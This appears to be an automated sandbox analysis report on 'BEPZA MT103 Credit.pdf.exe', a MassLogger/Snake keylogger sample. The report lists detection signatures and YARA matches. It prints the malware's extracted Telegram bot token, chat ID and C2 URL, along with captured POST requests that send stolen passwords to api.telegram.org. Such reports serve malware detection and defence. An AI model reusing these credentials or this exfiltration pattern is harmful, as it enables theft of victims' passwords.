Windows Analysis Report
BEPZA MT103 Credit.pdf.exe

Overview

General Information

Sample name: BEPZA MT103 Credit.pdf.exe
Analysis ID: 1665813
MD5: ef4d4ab7e588827c7a17293b53a30d1f
SHA1: 6e2fd3bc90fce07f121e9eb3ad94545f30773ec6
SHA256: c6de8c6d5228fa7a6101a2cf1574d974f48d8e6caf1c862cc5004d36cf3d527b
Tags: exe, user-James_inthe_box

Detection

MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection

Source: BEPZA MT103 Credit.pdf.exe Avira: detected
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Avira: detection malicious, Label: HEUR/AGEN.1307338
Source: 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs", "Telegram Chatid": "7135428463"}
Source: YEGIgzyAhkvT.exe.8120.16.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendMessage"}
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe ReversingLabs: Detection: 75%
Source: BEPZA MT103 Credit.pdf.exe Virustotal: Detection: 66%
Source: BEPZA MT103 Credit.pdf.exe ReversingLabs: Detection: 75%
Source: Submitted Sample Neural Call Log Analysis: 99.8%

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: BEPZA MT103 Credit.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49695 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49696 version: TLS 1.0
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: BEPZA MT103 Credit.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 4x nop then jmp 02B99731h 10_2_02B99480
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 4x nop then jmp 02B99E5Ah 10_2_02B99A30
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 4x nop then jmp 02B99E5Ah 10_2_02B99D87
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 4x nop then jmp 01269731h 16_2_01269480
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 4x nop then jmp 01269E5Ah 16_2_01269A40
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 4x nop then jmp 01269E5Ah 16_2_01269A30
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 4x nop then jmp 01269E5Ah 16_2_01269D87

Networking

Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49699 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49698 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49698 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.5:49699 -> 149.154.167.220:443
Source: unknown DNS query: name: api.telegram.org
Source: global traffic HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd7c32738635ea Host: api.telegram.org Content-Length: 1095 Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd7c3273964b09 Host: api.telegram.org Content-Length: 1095 Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View IP Address: 104.21.80.1 104.21.80.1
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: checkip.dyndns.org
Source: unknown DNS query: name: reallyfreegeoip.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49689 -> 132.226.247.73:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49693 -> 132.226.247.73:80
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49695 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49696 version: TLS 1.0
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/89.187.171.161 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135428463&caption=user%20/%20Passwords%20/%2089.187.171.161 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd7c32738635ea Host: api.telegram.org Content-Length: 1095 Connection: Keep-Alive
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.orgd
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.comd
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D5C000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/d
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.orgd
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3718729312.0000000006450000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m1
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.orgd
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1284942009.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002D71000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 0000000B.00000002.1310845235.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002EC4000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002E44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7637203109:AAEwF0h434NduLaTadsXsSgHvM5K6b5snDs/sendDocument?chat_id=7135
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3710711745.0000000000413000.00000040.00000400.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161d
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3715408005.0000000002DEE000.00000004.00000800.00020000.00000000.sdmp, YEGIgzyAhkvT.exe, 00000010.00000002.3714406574.0000000002D6E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/89.187.171.161l
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49698 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, UltraSpeed.cs .Net Code: VKCodeToUnicode

System Summary

Source: 10.2.BEPZA MT103 Credit.pdf.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.BEPZA MT103 Credit.pdf.exe.41734f8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.BEPZA MT103 Credit.pdf.exe.415c6d8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 8092, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: BEPZA MT103 Credit.pdf.exe PID: 4012, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: initial sample Static PE information: Filename: BEPZA MT103 Credit.pdf.exe
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_02FB4B00 0_2_02FB4B00
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_02FBD3C4 0_2_02FBD3C4
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_05658890 0_2_05658890
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_05650040 0_2_05650040
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_05650006 0_2_05650006
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_0565D5B3 0_2_0565D5B3
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077B5E00 0_2_077B5E00
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077BB0E0 0_2_077BB0E0
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077BE942 0_2_077BE942
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C57750 0_2_07C57750
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C57760 0_2_07C57760
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C55618 0_2_07C55618
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C55628 0_2_07C55628
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C56D50 0_2_07C56D50
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C56D60 0_2_07C56D60
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C5D560 0_2_07C5D560
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C55A60 0_2_07C55A60
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C551F0 0_2_07C551F0
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C5E9A8 0_2_07C5E9A8
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B9C530 10_2_02B9C530
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B99480 10_2_02B99480
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B9C521 10_2_02B9C521
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B92DDB 10_2_02B92DDB
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_02B9946F 10_2_02B9946F
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD60F7 10_2_06BD60F7
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD5DB4 10_2_06BD5DB4
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BDB650 10_2_06BDB650
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD31A8 10_2_06BD31A8
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD6C71 10_2_06BD6C71
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 10_2_06BD4A60 10_2_06BD4A60
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0136D3C4 11_2_0136D3C4
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07485E00 11_2_07485E00
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0748B0E0 11_2_0748B0E0
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0748E942 11_2_0748E942
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07887750 11_2_07887750
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07887760 11_2_07887760
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07885618 11_2_07885618
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07885628 11_2_07885628
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0788DD00 11_2_0788DD00
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07886D50 11_2_07886D50
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07886D60 11_2_07886D60
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_0788CCC0 11_2_0788CCC0
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07885A60 11_2_07885A60
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_078851F0 11_2_078851F0
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126C530 16_2_0126C530
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_01262DD1 16_2_01262DD1
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_01269480 16_2_01269480
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126C521 16_2_0126C521
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126946F 16_2_0126946F
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C05DB4 16_2_06C05DB4
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C0B650 16_2_06C0B650
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C031A8 16_2_06C031A8
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C06C71 16_2_06C06C71
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C04A60 16_2_06C04A60
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1290497028.0000000008160000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000000.1263065941.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameIHia.exe0 vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1283020258.000000000140E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1285558357.00000000040F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 00000000.00000002.1284942009.00000000030F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3710700225.000000000041A000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCloudServices.exe< vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe, 0000000A.00000002.3711387177.0000000000BC7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe Binary or memory string: OriginalFilenameIHia.exe0 vs BEPZA MT103 Credit.pdf.exe
Source: BEPZA MT103 Credit.pdf.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
